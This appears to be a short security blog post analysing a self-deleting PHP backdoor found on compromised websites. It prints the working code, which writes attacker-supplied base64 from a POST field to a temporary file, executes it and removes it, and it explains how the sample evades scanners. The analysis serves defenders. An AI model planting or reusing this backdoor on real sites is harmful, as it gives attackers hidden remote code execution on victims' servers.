The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access.
During a recent investigation, we found an interesting variation of this technique. The code was intentionally created to inject backdoors and other tools, but possessed an unusual feature: the injected content is executed only once before self-destructing.
Here is the sample:
<?php
error_reporting(E_ERROR);set_time_limit(0);
if(isset($_POST['zzz'])){
$tofile='407.php';
$a =base64_decode(strtr($_POST['zzz'], '-_,', '+/='));
$a='<?php '.$a.'?>';
@file_put_contents($tofile,$a);
require_once('407.php');
@unlink($tofile);
exit;
}
?>
This malware is pretty simple and consists of only 13 lines. The code expects a $_POST request with the zzz variable.
Similarly to a malware dropper technique, the zzz variable is decoded and written into another file 407.php. In the statement require_once(), the injected content is evaluated (executed) and subsequently removed with the unlink() call.
The malware doesn’t rely on known abused executable functions (for example, the eval() function) and doesn’t store any encoded content, which are features that commonly trigger scanners used to detect possible malicious files.